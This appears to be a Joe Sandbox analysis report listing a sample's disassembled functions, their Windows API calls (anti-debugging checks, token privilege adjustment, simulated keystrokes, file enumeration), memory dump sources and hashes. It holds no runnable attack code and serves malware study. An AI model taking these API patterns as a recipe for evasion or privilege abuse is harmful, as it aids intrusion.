                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ErrorEventFileInternetLastRead
                                        • String ID:
                                        • API String ID: 234945975-0
                                        • Opcode ID: 299cebcdfbf7b18066779ebf13bb32d8b2a26c5dfcce900b760b0150c70c3d65
                                        • Instruction ID: 4c88926f067d1f9ee8fdf3947defc66988688d02edca9aaee1696047c15e1145
                                        • Opcode Fuzzy Hash: 299cebcdfbf7b18066779ebf13bb32d8b2a26c5dfcce900b760b0150c70c3d65
                                        • Instruction Fuzzy Hash: 5321BD71600305ABDB30DFA5C9C8BAAB7FCEB10314F10441EE696D2151E771EE45DB64
                                        Function 00C58298 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00C582AA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: lstrlen
                                        • String ID: ($|
                                        • API String ID: 1659193697-1631851259
                                        • Opcode ID: dc4dabc522ca2caaa9d5a76408d02251250b725bddb3eae2ed6f857c2cbab113
                                        • Instruction ID: 551c2a160e977809db8a05681d6531c3f8e04ea4a246b23f57ce819b23f78714
                                        • Opcode Fuzzy Hash: dc4dabc522ca2caaa9d5a76408d02251250b725bddb3eae2ed6f857c2cbab113
                                        • Instruction Fuzzy Hash: 97323979A006059FCB28CF19C48196AB7F0FF48710B15C56EE96AEB3A1DB70E985CB44
                                        Function 00C65C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?), ref: 00C65CC1
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00C65D17
                                        • FindClose.KERNEL32(?), ref: 00C65D5F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Find$File$CloseFirstNext
                                        • String ID:
                                        • API String ID: 3541575487-0
                                        • Opcode ID: 1daba52308c405a086ee20b7f182e6b045788fb29b77231ae5590924e10bf69c
                                        • Instruction ID: de46d69f7761ba02810561713a1811c8ee126d0e24979576013fa4641c45241b
                                        • Opcode Fuzzy Hash: 1daba52308c405a086ee20b7f182e6b045788fb29b77231ae5590924e10bf69c
                                        • Instruction Fuzzy Hash: 10518B75604A019FC724DF28C4D4E9AB7E4FF49314F24855DE96A8B3A2CB30ED45CB91
                                        Function 00C22622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • IsDebuggerPresent.KERNEL32 ref: 00C2271A
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C22724
                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 00C22731
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                        • String ID:
                                        • API String ID: 3906539128-0
                                        • Opcode ID: 962c869be01634aef14e32a31cf32d4c193e0162b6563655f044c4e1c7080a6a
                                        • Instruction ID: e7284d60cf3fc94576c0475dfb7357e84acfeccd3168e5b15345ab114d50cfd5
                                        • Opcode Fuzzy Hash: 962c869be01634aef14e32a31cf32d4c193e0162b6563655f044c4e1c7080a6a
                                        • Instruction Fuzzy Hash: BD31D37490122CABCB21DF68DC887DDBBB8AF08710F5041EAE81CA7260E7709F819F44
                                        Function 00C651CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 00C651DA
                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00C65238
                                        • SetErrorMode.KERNEL32(00000000), ref: 00C652A1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ErrorMode$DiskFreeSpace
                                        • String ID:
                                        • API String ID: 1682464887-0
                                        • Opcode ID: 36f777d54f43346b2332817e5247b8b26345c5767bfc1b89617fe4c86aeb62e0
                                        • Instruction ID: 18a9e64db631dd2f361aad25cfb0c72745868dc5eccc54473d9f12a405cad1be
                                        • Opcode Fuzzy Hash: 36f777d54f43346b2332817e5247b8b26345c5767bfc1b89617fe4c86aeb62e0
                                        • Instruction Fuzzy Hash: B6313A75A005189FDB00DF54D8D4BADBBB4FF48314F148099E905AB3A2DB31E95ACBA0
                                        Function 00C516C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00C0FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00C10668
                                          • Part of subcall function 00C0FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00C10685
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C5170D
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C5173A
                                        • GetLastError.KERNEL32 ref: 00C5174A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                        • String ID:
                                        • API String ID: 577356006-0
                                        • Opcode ID: 76f5d5028d5c89f5f5ed75126ba54d5a9059a5de5ee9802fa6744569a33bbe6e
                                        • Instruction ID: ce34d94be8e0cf9cdd6483152ad5237677a2c9b20d29151b0fdb06bd0a075d63
                                        • Opcode Fuzzy Hash: 76f5d5028d5c89f5f5ed75126ba54d5a9059a5de5ee9802fa6744569a33bbe6e
                                        • Instruction Fuzzy Hash: 231104B1400304AFD7189F64DCC6E6BB7B9EB44751B24802EF46653241EB70BC82CB24
                                        Function 00C5D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00C5D608
                                        • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00C5D645
                                        • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00C5D650
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CloseControlCreateDeviceFileHandle
                                        • String ID:
                                        • API String ID: 33631002-0
                                        • Opcode ID: 884a52bd61316001a5e1454c31a71394ad70327be0f21a9783a71a738de6e689
                                        • Instruction ID: e90cc5a043918b4459ff7cc14a27042afb469fd6aa41c8bbb58c73e50714dd60
                                        • Opcode Fuzzy Hash: 884a52bd61316001a5e1454c31a71394ad70327be0f21a9783a71a738de6e689
                                        • Instruction Fuzzy Hash: E1118E75E01328BFDB208F95DC84FAFBBBCEB45B60F108111F914E7290C6704A058BA5
                                        Function 00C51663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00C5168C
                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00C516A1
                                        • FreeSid.ADVAPI32(?), ref: 00C516B1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                        • String ID:
                                        • API String ID: 3429775523-0
                                        • Opcode ID: 0bf0cea703c002ff7f6719c423743ec5ad7addd57f3568c287db94d30ea854d2
                                        • Instruction ID: 5c3045f47618d20092f4845f3e0d9384c2bcad18982ae9b99979304a3349e419
                                        • Opcode Fuzzy Hash: 0bf0cea703c002ff7f6719c423743ec5ad7addd57f3568c287db94d30ea854d2
                                        • Instruction Fuzzy Hash: 7DF04475940308FBDB00CFE0DC89FAEBBBCEB08240F104460E900E2180E730AA448B64
                                        Function 00C14CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00C228E9,?,00C14CBE,00C228E9,00CB88B8,0000000C,00C14E15,00C228E9,00000002,00000000,?,00C228E9), ref: 00C14D09
                                        • TerminateProcess.KERNEL32(00000000,?,00C14CBE,00C228E9,00CB88B8,0000000C,00C14E15,00C228E9,00000002,00000000,?,00C228E9), ref: 00C14D10
                                        • ExitProcess.KERNEL32 ref: 00C14D22
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Process$CurrentExitTerminate
                                        • String ID:
                                        • API String ID: 1703294689-0
                                        • Opcode ID: ef288ac24271ab48209f935d0b12f756b894178257918619d884ea7ef76c97e9
                                        • Instruction ID: bc10f62689508b1d8fb56412af77828a2a8de048b81d9e84b4e1af40d8f59084
                                        • Opcode Fuzzy Hash: ef288ac24271ab48209f935d0b12f756b894178257918619d884ea7ef76c97e9
                                        • Instruction Fuzzy Hash: 0BE0B631000148ABCF15BF54ED49B9C3B69FB42B91B104014FC198A132CB39EE82EB94
                                        Function 00C2C2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: /
                                        • API String ID: 0-2043925204
                                        • Opcode ID: fecccfe320c5131ff96f9355d759dc25eb1a0c086e7a558e1920e31c34ddaf8f
                                        • Instruction ID: 8e61449db1cfc1619ddf56e2501c58b3650f9cf0bde3b969b01c3e4420b75f0a
                                        • Opcode Fuzzy Hash: fecccfe320c5131ff96f9355d759dc25eb1a0c086e7a558e1920e31c34ddaf8f
                                        • Instruction Fuzzy Hash: EA413876500229ABCB24DFB9EC88EFF7778EB84314F104669F915C7590E6309E81CB50
                                        Function 00C4D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetUserNameW.ADVAPI32(?,?), ref: 00C4D28C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: NameUser
                                        • String ID: X64
                                        • API String ID: 2645101109-893830106
                                        • Opcode ID: 8ff101be5e0b47f22f1718abc60e0dca52477384f17f119adfa6d3928148a451
                                        • Instruction ID: 740debc41f745b0ea90b58572a7d9eed501f83106c2970c5324b831e4864145f
                                        • Opcode Fuzzy Hash: 8ff101be5e0b47f22f1718abc60e0dca52477384f17f119adfa6d3928148a451
                                        • Instruction Fuzzy Hash: DAD0C9B480511DEBCB90DB90DCC8EDDB77CBB04345F100191F506A2140D77095488F20
                                        Function 00C1CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                        • Instruction ID: 6670da9a36e392478df25802b2ee7d3b7116f0dbf74b481832e7dc6ac1136184
                                        • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                        • Instruction Fuzzy Hash: 65021C71E402199FDF14CFA9D8906EDBBF1EF49314F258169E829E7380D730AE419B84
                                        Function 00C668EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?), ref: 00C66918
                                        • FindClose.KERNEL32(00000000), ref: 00C66961
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Find$CloseFileFirst
                                        • String ID:
                                        • API String ID: 2295610775-0
                                        • Opcode ID: 37d22c70ee7f7c3eed8a669b9a25cab503336c4987c7ba1a13e8ea6761c7670a
                                        • Instruction ID: f364b01002d0291b6d5048349b88a08b894117306ae27eb9a9059f5128cb3292
                                        • Opcode Fuzzy Hash: 37d22c70ee7f7c3eed8a669b9a25cab503336c4987c7ba1a13e8ea6761c7670a
                                        • Instruction Fuzzy Hash: F2118E316042059FD710DF29D4C4A2AFBE5EF85328F14C699E9698F6A2CB30EC49CB91
                                        Function 00C637B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00C74891,?,?,00000035,?), ref: 00C637E4
                                        • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00C74891,?,?,00000035,?), ref: 00C637F4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ErrorFormatLastMessage
                                        • String ID:
                                        • API String ID: 3479602957-0
                                        • Opcode ID: 31aa241d3f74a99b4ca79f2d45069102120158d913f9a4e9987b0510a213972a
                                        • Instruction ID: b37968bbff4b269321e7a561f1bfff04ba85a5321203b0e9d7810c82bc4659b7
                                        • Opcode Fuzzy Hash: 31aa241d3f74a99b4ca79f2d45069102120158d913f9a4e9987b0510a213972a
                                        • Instruction Fuzzy Hash: ECF0E5B06042286AE72057B69C8DFEB3AAEEFC4761F000165F509D32D1D9709945C7B0
                                        Function 00C5B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00C5B25D
                                        • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00C5B270
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: InputSendkeybd_event
                                        • String ID:
                                        • API String ID: 3536248340-0
                                        • Opcode ID: 85d58d5534979431ee75fbe1036ae9f5c23f0475c3920d8e296ee59bed4137ee
                                        • Instruction ID: cecb2f98292743a8482f99bcbf73a9f2ccdf1637c7905965a9a25e5f057059e6
                                        • Opcode Fuzzy Hash: 85d58d5534979431ee75fbe1036ae9f5c23f0475c3920d8e296ee59bed4137ee
                                        • Instruction Fuzzy Hash: 6EF01D7580424EABDF059FA1C805BAE7FB4FF04305F008009F965A5192C77986559FA8
                                        Function 00C510BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                        Download Yara Rule
                                        APIs
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C511FC), ref: 00C510D4
                                        • CloseHandle.KERNEL32(?,?,00C511FC), ref: 00C510E9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: AdjustCloseHandlePrivilegesToken
                                        • String ID:
                                        • API String ID: 81990902-0
                                        • Opcode ID: bc87bb4240c6fc6b932ca97cc81809953acb07612de8ebdcf54973b82fa1261a
                                        • Instruction ID: 4ccb0719e7ebca8967cb01fc7bd99e01778f85f7e69fadb5b38e0ff39bcea8d3
                                        • Opcode Fuzzy Hash: bc87bb4240c6fc6b932ca97cc81809953acb07612de8ebdcf54973b82fa1261a
                                        • Instruction Fuzzy Hash: 45E04F32004600AEE7252B61FC09F7777A9EB04320F24882DF8A5804F1DB72ACD1EB64
                                        Function 00BFCAF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON
                                        Download Yara Rule
                                        Strings
                                        • Variable is not of type 'Object'., xrefs: 00C40C40
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Variable is not of type 'Object'.
                                        • API String ID: 0-1840281001
                                        • Opcode ID: 6ffb66895e80f7a39eb27018633bf91d48d8e7e53ac472fc282d97f41ac56bb5
                                        • Instruction ID: da96d6a33ba5b04d69cce06910ff7a7375ebca32ea758fa906afcfd399e5003a
                                        • Opcode Fuzzy Hash: 6ffb66895e80f7a39eb27018633bf91d48d8e7e53ac472fc282d97f41ac56bb5
                                        • Instruction Fuzzy Hash: BA324A7490021C9BCF14DF94CA81AFDBBF5FF04304F2440A9EA16AB292D775AE89DB51
                                        Function 00C2676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00C26766,?,?,00000008,?,?,00C2FEFE,00000000), ref: 00C26998
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
